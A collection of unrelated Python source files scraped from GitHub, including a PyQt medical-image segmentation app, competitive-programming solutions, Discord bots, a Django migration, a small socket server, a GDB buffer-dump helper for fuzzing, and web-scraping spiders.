mrn.simpleVolumeFrom3Darray(mask_array.astype(float))\r\n\r\n # Convertir SimpleVolume a FloatGrid\r\n floatGrid = mr.simpleVolumeToDenseGrid(simpleVolume)\r\n\r\n # Crear malla usando un iso-valor y el tamaño de voxel\r\n mesh = mr.gridToMesh(floatGrid, mr.Vector3f(0.1, 0.1, 0.1), 0.5)\r\n\r\n # Guardar la malla como STL\r\n stl_path = os.path.join(predictions_folder, 'mesh.stl')\r\n mr.saveMesh(mesh, stl_path)\r\n \r\n def segmentacion(self):\r\n try:\r\n subject = tio.Subject(image=tio.ScalarImage(self.ruta_completa))\r\n preprocess = self.get_preprocessing_transform()\r\n preprocessed_subject = preprocess(subject)\r\n\r\n predictions_folder = 'predictions'\r\n if not os.path.exists(predictions_folder):\r\n os.makedirs(predictions_folder)\r\n\r\n with torch.no_grad():\r\n input_tensor = preprocessed_subject['image'][tio.DATA][None]\r\n input_tensor = input_tensor.to(device)\r\n output = model(input_tensor)\r\n output_label = output.argmax(dim=1, keepdim=True).cpu()\r\n output_label_squeezed = output_label.squeeze(0)\r\n\r\n mask_array = output_label.numpy().squeeze()\r\n mask_array = (mask_array * 255).astype(np.uint8)\r\n\r\n # Guardar cada corte del volumen como PNG y la lista de rutas\r\n self.mascaras_obtenidas = []\r\n for i, slice in enumerate(mask_array):\r\n slice_image = Image.fromarray(slice)\r\n slice_path = os.path.join(predictions_folder, f'mask_slice_{i}.png')\r\n slice_image.save(slice_path)\r\n self.mascaras_obtenidas.append(slice_path)\r\n\r\n # Guardar la segmentación completa como archivo NIfTI\r\n nifti_path = os.path.join(predictions_folder, 'segmentacion_completa.nii.gz')\r\n segmented_image = tio.ScalarImage(tensor=output_label_squeezed)\r\n segmented_image.save(nifti_path)\r\n\r\n # Calcular el volumen\r\n # Asumiendo que cada voxel es 1x1x1 mm^3, pero verifica esto con tus datos\r\n volumen = np.sum(segmented_image.numpy() > 0) # Cuenta los voxels en la ROI\r\n self.t_vol_h.setText(str(volumen)+\"mm3\") # Muestra el volumen calculado\r\n self.convertir_a_stl(mask_array, predictions_folder)\r\n\r\n print(\"Segmentación completada y máscaras guardadas.\")\r\n except Exception as e:\r\n print(f\"Error en la segmentación: {e}\")\r\n\r\n \r\n def mostrar_frames_graph_2(self):\r\n try:\r\n self.rutas_frame_seg = self.mascaras_obtenidas\r\n self.index_orig = 0\r\n\r\n if self.rutas_frame_seg:\r\n self.graph_2.setPixmap(QtGui.QPixmap(str(self.rutas_frame_seg[self.index_orig])))\r\n self.t_frame.setText(str(self.index_orig))\r\n else:\r\n print(\"No hay máscaras para mostrar.\")\r\n except Exception as e:\r\n print(f\"Error al mostrar las imágenes segmentadas: {e}\")\r\n\r\n\r\n def guardar_carpeta(self):\r\n options = QFileDialog.Options()\r\n options |= QFileDialog.DontUseNativeDialog\r\n escritorio = os.path.expanduser(\"~/Desktop\")\r\n carpeta_seleccionada = QFileDialog.getExistingDirectory(self, \"Guardar Carpeta...\", escritorio, options=options)\r\n\r\n if carpeta_seleccionada:\r\n try:\r\n carpeta_origen = self.ruta_nueva\r\n carpeta_destino = os.path.join(carpeta_seleccionada, self.nombre_aux+\"_result\")\r\n\r\n if os.path.exists(carpeta_destino):\r\n contador = 1\r\n while True:\r\n nuevo_nombre = f\"{self.nombre_aux} ({contador})\"+\"_result\"\r\n carpeta_destino = os.path.join(carpeta_seleccionada, nuevo_nombre)\r\n if not os.path.exists(carpeta_destino):\r\n break\r\n contador += 1\r\n\r\n shutil.copytree(carpeta_origen, carpeta_destino)\r\n print(\"Carpeta de destino:\", carpeta_destino)\r\n print(\"Guardado con éxito\")\r\n except FileNotFoundError as e:\r\n print(\"Error: La carpeta de origen no se encuentra.\")\r\n except PermissionError as e:\r\n print(\"Error: No tienes permisos para copiar la carpeta.\")\r\n except Exception as e:\r\n print(f\"Error al copiar la carpeta: {e}\")\r\n\r\n def closeEvent(self, event):\r\n confirmacion = QtWidgets.QMessageBox.question(self, \"Confirmar Salida\", \"¿Estás seguro de que deseas salir?\",\r\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)\r\n if confirmacion == QtWidgets.QMessageBox.Yes:\r\n event.accept()\r\n else:\r\n event.ignore()\r\n\r\nclass Ventana_dos(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(Ventana_dos, self).__init__(parent)\r\n loadUi(\"interfaz_acsi_choose.ui\", self)\r\n self.acept_f.clicked.connect(self.close_segunda_ventana)\r\n self.setWindowTitle(\"Proyecto ACSI\")\r\n self.setFixedSize(234, 84)\r\n\r\n def close_segunda_ventana(self):\r\n try:\r\n new_i_frame = int(self.c_frame.toPlainText())\r\n print(\"Valor de c_frame:\", new_i_frame)\r\n self.parent().recibir_new_frame(new_i_frame)\r\n self.close()\r\n except Exception as e:\r\n print(f\"Error: {e}\")\r\n\r\nclass Ventana_tres(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(Ventana_tres, self).__init__(parent)\r\n loadUi(\"interfaz_acsi_info.ui\", self)\r\n self.setWindowTitle(\"Proyecto ACSI\")\r\n self.setFixedSize(527, 306)\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MyApp()\r\n window.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"cpariona/Hippocampus-3D-Segmentation","sub_path":"codigo_fuente/code_function_acsi.py","file_name":"code_function_acsi.py","file_ext":"py","file_size_in_byte":24945,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"10285886636","text":"# BOJ 10989 Sort 3 -Counting Sort\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ndic = dict()\nfor _ in range(n):\n x = int(input())\n if x in dic:\n dic[x] += 1\n else :\n dic[x] = 1\nfor key,count in sorted(dic.items()):\n for _ in range(count):\n print(key)","repo_name":"Qud4300/Baekjoon_Online_Judge","sub_path":"10989 수 정렬하기 3/sort3.py","file_name":"sort3.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31900442828","text":"#your usual imports and then this code\r\n\r\n@client.command()\r\nasync def user(ctx, member:discord.Member=None):\r\n if member is None:\r\n member = ctx.message.author\r\n pronoun = \"Your\"\r\n else:\r\n pronoun = str(member)\r\n name = f\"{member.name}#{member.discriminator}\"\r\n status = ctx.author.status.name\r\n created_on = member.created_at.__format__('%A, %d. %B %Y @ %H:%M:%S')\r\n userAvatarUrl = member.avatar_url\r\n join = member.joined_at.__format__('%A, %d. %B %Y @ %H:%M:%S')\r\n statoos = member.activity\r\n house = member.top_role\r\n permissions = member.permissions_in(ctx.message.channel)\r\n #userhighest role\r\n await ctx.send(\"``` ```\")\r\n await ctx.send(f\"\"\"**`Here's Some Dirt On:` {member.mention}!:\r\nUsername is: `{str(member.name)}`\r\nUserTag is: `{str(member.discriminator)}`\r\nUser ID is: `{str(member.id)}`\r\nUser Presence is: `{str(status)}`\r\nUser Is Playing: `{str(statoos)}`\r\nUser Highest Role: `{str(house)}`\r\nUser Created On: `{str(created_on)}`\r\nUser Joined On: `{str(join)}`\r\nUser Permissions: `{str(permissions)}`**\"\"\")\r\n await ctx.send(userAvatarUrl)\r\n await ctx.send(\"``` ```\")","repo_name":"Javi-beep/discord-bot-commands","sub_path":"info kinda commands/userstats.py","file_name":"userstats.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10599408914","text":"import sys\nimport heapq as hq\ninput = sys.stdin.readline\n\ndef dijkstra(start):\n q = []\n distance = [INF] * (n+1)\n \n hq.heappush(q, (0, start))\n distance[start] = 0\n while q:\n dist, now = hq.heappop(q)\n if distance[now] < dist: continue # 이미 갱신됨\n for cost, next in graph[now]:\n tmp = dist + cost\n if distance[next] > tmp:\n distance[next] = tmp\n hq.heappush(q, (tmp, next))\n \n return distance\n\ndef calculate_infection():\n count, time = 0, 0\n distance = dijkstra(c)\n for d in distance:\n if d < INF:\n count +=1\n time = max(time, d)\n return count, time \n\nif __name__ == \"__main__\":\n INF = int(1e9)\n t = int(input())\n for _ in range(t):\n n, d, c = map(int, input().split())\n\n # 의존성\n graph = [[] for _ in range(n+1)]\n for _ in range(d):\n a, b, s = map(int, input().split())\n graph[b].append((s, a))\n \n print(\" \".join(map(str, calculate_infection())))\n ","repo_name":"Altu-Bitu-2/Altu-Bitu-Algorithms-Study","sub_path":"[최단 경로] 5월 3일/B10282.py","file_name":"B10282.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14642763966","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('place', '0006_auto_20171231_1554'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Hotel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('country_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u56fd\\u5bb6id')),\n ('province_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u7701\\u4efdid')),\n ('city_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u57ce\\u5e02id')),\n ('district_id', models.IntegerField(default=-1, verbose_name='\\u6240\\u5c5e\\u884c\\u653f\\u533aid')),\n ('name', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u540d\\u79f0')),\n ('en_name', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u82f1\\u6587\\u540d\\u79f0')),\n ('addr', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u5730\\u5740')),\n ('price', models.DecimalField(default=0.0, max_digits=16, decimal_places=8)),\n ('lng', models.DecimalField(default=0.0, max_digits=16, decimal_places=8)),\n ('lat', models.DecimalField(default=0.0, max_digits=16, decimal_places=8)),\n ('cmt_num', models.IntegerField(default=-1, verbose_name='\\u8bc4\\u8bba\\u6570\\u76ee')),\n ('pts', models.DecimalField(default=0.0, verbose_name='\\u8bc4\\u5206', max_digits=16, decimal_places=8)),\n ('pts_level', models.CharField(default=b'', max_length=200, verbose_name='\\u8bc4\\u5206\\u7b49\\u7ea7')),\n ('note_num', models.IntegerField(default=-1, verbose_name='\\u6e38\\u8bb0\\u6570\\u76ee')),\n ('desc', models.CharField(default=b'', max_length=200, verbose_name='\\u63cf\\u8ff0')),\n ('main_pic', models.CharField(default=b'', max_length=200, verbose_name='\\u9152\\u5e97\\u4e3b\\u56fe')),\n ('url', models.CharField(default=b'', max_length=200, null=True, verbose_name='url\\u94fe\\u63a5')),\n ('status', models.IntegerField(default=-1, verbose_name='\\u9152\\u5e97\\u72b6\\u6001')),\n ('created', models.DateTimeField(auto_now_add=True, null=True)),\n ('updated', models.DateTimeField(auto_now=True, null=True)),\n ],\n ),\n ]\n","repo_name":"Cribbee/gofree130","sub_path":"place/migrations/0007_hotel.py","file_name":"0007_hotel.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"14493584633","text":"#!/usr/bin/env python3\r\n\r\nimport socket\r\nimport os, sys, json\r\nimport signal\r\nfrom subprocess import Popen, PIPE\r\n\r\nPORT = 65432 # Port to listen on (non-privileged ports are > 1023)\r\nHOST = '127.0.0.1' # Standard loopback interface address (localhost)\r\nHOST = socket.gethostname()\r\n\r\n#To run and survive closing terminal: nohup python socket-server.py\r\n#To run periodically - chrontab -e: \r\n# 00 * * * * python /var/www/html/projects/asly/socket-server.py\r\n\r\n\r\ndef kill_port_proc(port_num):\r\n process = Popen([\"lsof\", \"-i\", \":{0}\".format(port_num)], stdout=PIPE, stderr=PIPE)\r\n stdout, stderr = process.communicate()\r\n for process in str(stdout.decode(\"utf-8\")).split(\"\\n\")[1:]: \r\n data = [x for x in process.split(\" \") if x != '']\r\n if (len(data) <= 1):\r\n continue\r\n\r\n os.kill(int(data[1]), signal.SIGKILL)\r\n print(\"Killed process, please run the script again\")\r\n\r\n#Now for the application specific part, functions, libraries, and data to load\r\n#Application specific libraries\r\n# sys.path.append(\"/var/www/html/code_utils\")\r\n# from parsing_lib import *\r\n\r\n#shelve_fpath=\"parsing/verbs.shelve\"\r\n\r\n#identify the data processing function for each application\r\ndef process_data(data0):\r\n data0_decoded=data.decode(\"utf-8\")\r\n data0_decoded='Test: %s'%data0_decoded\r\n output0=data0_decoded.encode(\"utf-8\")\r\n return output0\r\n\r\n\r\n\r\ntry:\r\n while True:\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.bind((HOST, PORT))\r\n s.listen()\r\n conn, addr = s.accept()\r\n with conn:\r\n print('Connected by', addr)\r\n while True:\r\n data = conn.recv(1024)\r\n \r\n output=process_data(data)\r\n if not data:\r\n break\r\n #conn.sendall(data)\r\n conn.sendall(output)\r\nexcept: #if the port is already used and we want to restart it \r\n pass\r\n kill_port_proc(PORT)\r\n print(\"Killed the port process, run the script again\")\r\n\r\n","repo_name":"hmghaly/word_align","sub_path":"socket-server.py","file_name":"socket-server.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71807567584","text":"\"\"\"\n\n Extract the data contained in a buffer and save to file\n\n Usefull to create a input file for afl-unicorn\n\n 2018 Giulio Ginesi\n\n\"\"\"\n\nimport gdb\nimport zlib\nimport datetime\nimport time\n\nBUFFER_ADDR = 0x76c6a008\nBUFFER_LEN = 0x200ee\n\ntry:\n buffer = read_memory(BUFFER_ADDR, BUFFER_LEN)\n print(\"Dumping buffer from 0x{0:x} of length 0x{1:x}\".format(BUFFER_ADDR, BUFFER_LEN))\nexcept:\n print(\"Error reading memory region!\")\n\n#compressed_buffer = zlib.compress(buffer)\n\ntimestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%H%M%S')\ntry:\n out_name = 'input_'+timestamp+'.bin'\n out_file = open(out_name, 'wb')\n out_file.write(buffer)\n out_file.close()\n print(\"Saved file with name {}\".format(out_name))\nexcept:\n print(\"Error saving file!\")\n","repo_name":"blazef104/avionics-fuzzing","sub_path":"fuzzing/afl-unicorn/tools/extract_from_memory.py","file_name":"extract_from_memory.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"}
+{"seq_id":"27858809526","text":"import scrapy\nimport logging\nimport pytz\n\nfrom datetime import datetime\nfrom salescanner.crawling.spiders.utils.utils import Utils\nfrom salescanner.crawling.items import SalescannerItem\nfrom salescanner.crawling.spiders.utils.spider_indexor import SpiderIndexor\n\n\n@SpiderIndexor('olx')\nclass OLXAdsSpider(scrapy.Spider):\n\n MAX_NUMBER_OF_PAGES = 25\n name = 'olx_sales'\n\n def __init__(self, **kwargs):\n self.allowed_domains = ['olx.bg']\n self.start_urls = ['https://www.olx.bg/ads/']\n self.pages_processed = 0\n\n super().__init__(**kwargs)\n logging.getLogger('scrapy').setLevel(logging.WARNING)\n\n def parse(self, response):\n print(f'OLX LIST PAGE: {response.url}')\n offers_response = response.css('.offers')[1].css('.detailsLinkPromoted::attr(href), .detailsLink::attr(href)')\n offers_urls = set(offers_response.getall())\n\n for offer_url in offers_urls:\n split_url = offer_url.split('/')\n if 'job' in split_url or 'ad' not in split_url:\n continue\n\n if 'd' in split_url:\n split_url.remove('d')\n offer_url = '/'.join(split_url)\n\n yield scrapy.Request(offer_url, callback=self.parse_details_page)\n self.pages_processed += 1\n\n next_page_url = response.css('.next > a.pageNextPrev::attr(href)').get()\n if next_page_url is not None and self.pages_processed < OLXAdsSpider.MAX_NUMBER_OF_PAGES:\n yield scrapy.Request(next_page_url, callback=self.parse, dont_filter=True)\n \n\n def parse_details_page(self, response):\n split_url = response.url.split('/')\n if 'job' in split_url or 'ad' not in split_url:\n return\n\n image_url = response.css('.descgallery__image img.bigImage::attr(src)').get()\n title = response.css('.offer-titlebox > h1::text').get()\n price = response.css('.offer-titlebox__price > .pricelabel > strong::text').get()\n description = response.css('.descriptioncontent > #textContent *::text').getall()\n description = ' '.join([line.strip() for line in description])\n upload_datetime = response.css('.offer-bottombar__items .offer-bottombar__item em strong::text').get()\n \n ad_item = SalescannerItem()\n ad_item['url'] = response.url\n ad_item['title'] = title.strip() if title else title\n ad_item['price'] = price.strip() if price else price\n ad_item['image_url'] = image_url\n ad_item['description'] = description\n ad_item['upload_time'] = self.parse_upload_datetime(upload_datetime)\n yield ad_item\n\n def parse_upload_datetime(self, datetime_str):\n if datetime_str is None:\n return None\n\n datetime_str = datetime_str.strip()\n datetime_str = datetime_str[2:].split(',')\n time_portion = datetime_str[0].split(':')\n date_portion = datetime_str[1].strip().split(' ')\n\n datetime_obj = datetime(\n int(date_portion[2]),\n Utils.month_to_number(date_portion[1]),\n int(date_portion[0]),\n int(time_portion[0]),\n int(time_portion[1]))\n return self._datetime_to_timestamp(datetime_obj)\n \n def _datetime_to_timestamp(self, datetime_obj):\n timezone = pytz.timezone('Europe/Sofia')\n datetime_obj = timezone.localize(datetime_obj)\n\n return int(datetime_obj.timestamp() * 1000)\n","repo_name":"ZdravkoHvarlingov/sale-scanner","sub_path":"salescanner/crawling/spiders/olx_ads_spider.py","file_name":"olx_ads_spider.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"30420574537","text":"from __future__ import annotations\n\nimport asyncio\nimport hikari\nimport lightbulb\nimport logging\nimport miru\nimport config\nimport solis.helper.riddle\nfrom solis.views.view import ButtonView\nfrom __init__ import __version__\nfrom aiohttp import ClientSession\nfrom pytz import utc\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\n\nis_playing_riddle = False\n\n\ndef setup() -> None:\n logging.info(\"Running bot setup...\")\n\n\nbot = lightbulb.BotApp(\n token=config.token,\n default_enabled_guilds=config.DEFAULT_GUILD_ID,\n owner_ids=config.OWNERS_ID,\n help_slash_command=True,\n case_insensitive_prefix_commands=True,\n prefix=\"!\",\n intents=hikari.Intents.ALL\n\n)\nbot.d.scheduler = AsyncIOScheduler()\nbot.d.scheduler.configure(timezome=utc)\nbot.load_extensions_from(\"../solis/extensions\")\nmiru.load(bot)\n\n\n@bot.listen(hikari.StartingEvent)\nasync def on_starting(event: hikari.StartingEvent) -> None:\n bot.d.scheduler.start()\n bot.d.session = ClientSession(trust_env=True)\n logging.info(\"AIOHTTP session started\")\n\n\n@bot.listen(hikari.StartedEvent)\nasync def on_started(event: hikari.StartedEvent) -> None:\n await bot.rest.create_message(\n config.TEST_CHANNEL_ID,\n f\"Solis is now online! (Version {__version__})\"\n )\n\n\n@bot.listen(hikari.StoppingEvent)\nasync def on_stopping(event: hikari.StoppingEvent) -> None:\n await bot.d.session.close()\n logging.info(\"AIOHTTP session closed\")\n bot.d.scheduler.shutdown()\n await bot.rest.create_message(\n config.TEST_CHANNEL_ID,\n f\"Solis is shutting down. (Version {__version__})\"\n )\n\n\n@bot.listen(hikari.DMMessageCreateEvent)\nasync def on_pm_message_create(event: hikari.DMMessageCreateEvent) -> None:\n if event.message.author.is_bot:\n return\n\n await event.message.respond(\n f\"You need to DM <@{config.BOT_OWNER}> to send a message to moderators.\"\n )\n\n\n@bot.command\n@lightbulb.command('ping', 'say pong!')\n@lightbulb.implements(lightbulb.SlashCommand)\nasync def ping(ctx):\n await ctx.respond(\n f\"Pong! DWSP latency: {ctx.bot.heartbeat_latency * 1_000:,.0f} ms.\")\n\n\n@bot.command\n@lightbulb.command('button', 'button test')\n@lightbulb.implements(lightbulb.SlashCommand)\nasync def button(ctx: lightbulb.SlashContext):\n view = ButtonView(timeout=60)\n message = await ctx.respond(\"Button test\", components=view.build())\n message = await message\n view.start(message)\n await view.wait()\n print(\"All done.\")\n\n\ndef run() -> None:\n setup()\n bot.run(\n activity=hikari.Activity(\n name=f\"/help | Version {__version__}\",\n type=hikari.ActivityType.WATCHING\n )\n )\n\n\n# Bot is listening to the specified guilds\n@bot.listen(hikari.GuildMessageCreateEvent)\nasync def on_guild_message_event(event: hikari.GuildMessageCreateEvent) -> None:\n event_author = event.message.author\n message = event.message\n\n global is_playing_riddle\n if event_author.is_bot or not message.content:\n return\n\n if any(e in message.content.lower().split(\" \") or i in message.content.lower()\n for e in {\"gm\", \"gm!\", \"goodmorning\"}\n for i in {\"good morning\", \"morning everyone\"}):\n await message.respond(\"Good morning! \" + event_author.mention,\n user_mentions=True,\n mentions_reply=True)\n\n if any(e in message.content.lower().split(\" \") or i in message.content.lower()\n for e in {\"gn\", \"gn!\", \"goodnight\"}\n for i in {\"good night\", \"night everyone\"}):\n await message.respond(\"Good night! \" + event_author.mention,\n user_mentions=True,\n mentions_reply=True)\n\n if any(e in message.content.lower().split(\" \") for e in\n {\"riddle\", \"teaser\", \"riddles\", \"teasers\"}) and is_playing_riddle is False \\\n and message.content != \"!fun riddle\" and message.content != \"/fun riddle\":\n resp = await message.respond(\"Did someone mention a riddle? :eyes: \" + event_author.mention,\n user_mentions=True,\n mentions_reply=True)\n await resp.add_reaction(\"❌\")\n await resp.add_reaction(\"✅\")\n is_playing_riddle = True\n try:\n reaction = await bot.wait_for(\n hikari.ReactionAddEvent,\n timeout=10,\n predicate=lambda new_event:\n isinstance(new_event, hikari.ReactionEvent)\n and new_event.user_id == event_author.id\n and str(new_event.emoji_name) in {\"❌\", \"✅\"}\n )\n if reaction.emoji_name == \"✅\":\n await resp.remove_reaction(emoji=\"❌\")\n await solis.helper.riddle.on_riddle(message)\n is_playing_riddle = False\n else:\n await resp.remove_reaction(emoji=\"✅\")\n await resp.edit(\"Okay maybe next time!\")\n is_playing_riddle = False\n\n except asyncio.TimeoutError:\n is_playing_riddle = False\n await message.respond(\"The riddle timed out :c\")\n\n\n@bot.listen(lightbulb.CommandErrorEvent)\nasync def on_command_error(event: lightbulb.CommandErrorEvent) -> None:\n exc = getattr(event.exception, \"__cause__\", event.exception)\n\n if isinstance(exc, lightbulb.NotOwner):\n await event.context.respond(\"You need to be an owner to do that.\")\n return\n raise event.exception\n\n\n","repo_name":"Memo-Aldu/solis","sub_path":"solis/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20412268303","text":"\"\"\"\nAssumptions:\n None\n\nAlgorithm:\n 1. divisor = 10^(number of digits - 1)\n 2. While n != 0\n a. first = (int) n / divisor\n b. last = (int) n % 10\n c. if head != tail:\n return False\n d. remove first and last element from n\n e. divide divisor by 100\n 3. return True\n\nTime complexity : O(log(n))\n\nSpace complexity : O(1)\n\"\"\"\n\nfrom math import log10\n\n\ndef is_palindrome(n: int):\n \"\"\"\n To check whether a integer is a palindrome or not\n :param n: integer\n :return: Boolean\n \"\"\"\n digits = int(log10(n)) # to get number of digits - 1\n divisor = 10 ** digits\n\n while n is not 0:\n\n # to get the first element\n head = n // divisor\n\n # to get the last element\n tail = n % 10\n\n if head is not tail:\n return False\n\n # removing head element from n\n n %= divisor\n\n # removing tail element from n\n n //= 10\n\n # reducing divisor by 100 as two elements have been removed\n divisor //= 100\n\n return True\n","repo_name":"Pranjulcr7/Boodl-Tech_solutions","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"26731667338","text":"# https://www.youtube.com/watch?v=AShHJdSIxkY&ab_channel=MarkJay\n\nimport pyaudio\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nCHUNK = 1024 * 250\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\n\np = pyaudio.PyAudio()\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n frames_per_buffer=CHUNK)\n\nraw_data = stream.read(CHUNK)\ndata = np.frombuffer(raw_data, dtype=np.int16)\nplt.plot(data)\nplt.show()\n","repo_name":"animesh-chouhan/ledstrip-sound-reactive","sub_path":"capture_test.py","file_name":"capture_test.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"36082785128","text":"# coding: utf-8\nfrom datetime import datetime\n\nfrom scrapy import Spider, Request\nfrom dateutil import parser\nfrom pytz import timezone\nfrom w3lib.url import add_or_replace_parameter\n\nfrom pollution_app.pollution import Kind\nfrom pollution_app.items import AppItem\nfrom pollution_app.settings import SCRAPER_TIMEZONE\n\n\nclass EnglandSpider(Spider):\n name = u\"gb_england\"\n tz = u\"GMT\"\n source = u\"http://www.airqualityengland.co.uk\"\n\n def start_requests(self):\n codes = (u\"AY1\", u\"BAR6\", u\"BAR9\", u\"HB010\", u\"HB011\", u\"BAI2\", u\"WIL1\", u\"BUR2\", u\"BUR1\", u\"WIL8\", u\"WIL5\",\n u\"NEW2\", u\"CAM3\", u\"CAM5\", u\"CAM4\", u\"CAM1\", u\"CRL2\", u\"HB013\", u\"WIL3\", u\"HB012\", u\"EWE2\", u\"FAR2\",\n u\"GA1\", u\"GA2\", u\"GA3\", u\"GIRT\", u\"FAR1\", u\"T55\", u\"LHR2\", u\"T54\", u\"HEN\", u\"HB008\", u\"HB009\", u\"HI1\",\n u\"SIPS\", u\"HB002\", u\"HB003\", u\"HS5\", u\"HS4\", u\"HS2\", u\"HS9\", u\"HS8\", u\"HS7\", u\"HS6\", u\"BN2\", u\"HIL1\",\n u\"HIL4\", u\"HIL5\", u\"HI3\", u\"HB006\", u\"HB007\", u\"MAN1\", u\"MAN7\", u\"MAHG\", u\"WIL7\", u\"NUL1\", u\"OX6\",\n u\"OX3\", u\"REA2\", u\"REA4\", u\"RED3\", u\"IMP\", u\"ORCH\", u\"M60\", u\"WIL4\", u\"CW\", u\"SLH7\", u\"SLH3\", u\"SLH6\",\n u\"SLH5\", u\"SLH8\", u\"SLH9\", u\"SLH4\", u\"GX\", u\"SHOL\", u\"MONK\", u\"HB005\", u\"STK7\", u\"STK5\", u\"SUN2\",\n u\"SUN4\", u\"BN1\", u\"TAM1\", u\"TAME\", u\"GOS1\", u\"TRAF\", u\"TRF2\", u\"WD1\", u\"WL4\", u\"WL1\", u\"WL5\", u\"HB004\",\n u\"WAT\", u\"HB001\", u\"WID2\", u\"WID1\", u\"WIG7\", u\"NEW3\", u\"WYA4\", u\"WSTO\", u\"YK10\", u\"YK11\", u\"YK16\",\n u\"YK7\", u\"YK13\", u\"YK8\", u\"YK9\", u\"YK15\", u\"YK018\", u\"BAR3\", u\"BPLE\", u\"BATH\", u\"BIL\", u\"BBRD\",\n u\"BIRR\", u\"AGRN\", u\"BIR1\", u\"BLAR\", u\"BLC2\", u\"BORN\", u\"BDMA\", u\"BRT3\", u\"BRS8\", u\"BURW\", u\"CAM\",\n u\"CANK\", u\"CANT\", u\"CARL\", u\"MACK\", u\"CHAT\", u\"CHLG\", u\"CHS7\", u\"CHBO\", u\"CHBR\", u\"COAL\", u\"DCST\",\n u\"EB\", u\"EX\", u\"GLAZ\", u\"HM\", u\"HONI\", u\"HUL2\", u\"HULR\", u\"LB\", u\"LEAM\", u\"LEAR\", u\"LEED\", u\"LED6\",\n u\"LEIR\", u\"LECU\", u\"LEOM\", u\"LIN3\", u\"LVP\", u\"LH\", u\"LUTR\", u\"MAN3\", u\"MKTH\", u\"MID\", u\"NEWC\", u\"NCA3\",\n u\"NTN3\", u\"NO12\", u\"NOTT\", u\"NWBV\", u\"BOLD\", u\"OX\", u\"OX8\", u\"PLYM\", u\"PMTH\", u\"PRES\", u\"REA5\",\n u\"ROCH\", u\"ECCL\", u\"SASH\", u\"SDY\", u\"SCN2\", u\"SHBR\", u\"SHDG\", u\"SHE\", u\"SIB\", u\"SA33\", u\"SOUT\",\n u\"SEND\", u\"SHLW\", u\"OSY\", u\"SOTR\", u\"EAGL\", u\"STKR\", u\"STOK\", u\"STOR\", u\"SUNR\", u\"WAL4\", u\"WAR\",\n u\"WEYB\", u\"WFEN\", u\"WSMR\", u\"WIG5\", u\"TRAN\", u\"WTHG\", u\"YW\")\n\n # codes = (u\"LEIR\",)\n url = u\"http://www.airqualityengland.co.uk/site/latest\"\n for code_value in codes:\n url = add_or_replace_parameter(url, u\"site_id\", code_value)\n\n yield Request(\n url=url,\n callback=self.parse,\n meta={u\"code\": code_value}\n )\n\n def get_station_data(self, resp):\n data_time = resp.xpath(u'//*[@id=\"pageSubArea\"]/div/p[1]/text()').re(u\"(\\d\\d\\/\\d\\d\\/\\d\\d\\d\\d\\s\\d\\d:\\d\\d)\")\n data_time = parser.parse(data_time[0]).replace(tzinfo=timezone(self.tz)) if data_time else None\n\n table = resp.xpath(u'//*[@id=\"pageSubArea\"]/div/table/tr')[1:]\n\n station_data = dict()\n for row in table:\n pollutant_name = row.xpath(u'td[1]/text()').extract_first().split(u\" (\")[0]\n pollutant_name_ind = row.xpath(u'td[1]/sub/text()').extract_first() if row.xpath(u'td[1]/sub/text()').extract_first() != None else u\"\"\n pollutant_name_time = row.xpath(u\"td[last()]/text()\").extract_first()\n\n pollutant_name = (\n u\" \".join((pollutant_name, pollutant_name_ind, pollutant_name_time))\n ).replace(u\" \", u\" \")\n\n pollutant_value = row.xpath(u\"td[last() - 1]/text()\").extract_first()\n\n if pollutant_value is not None:\n if u\"\\xa0\" in 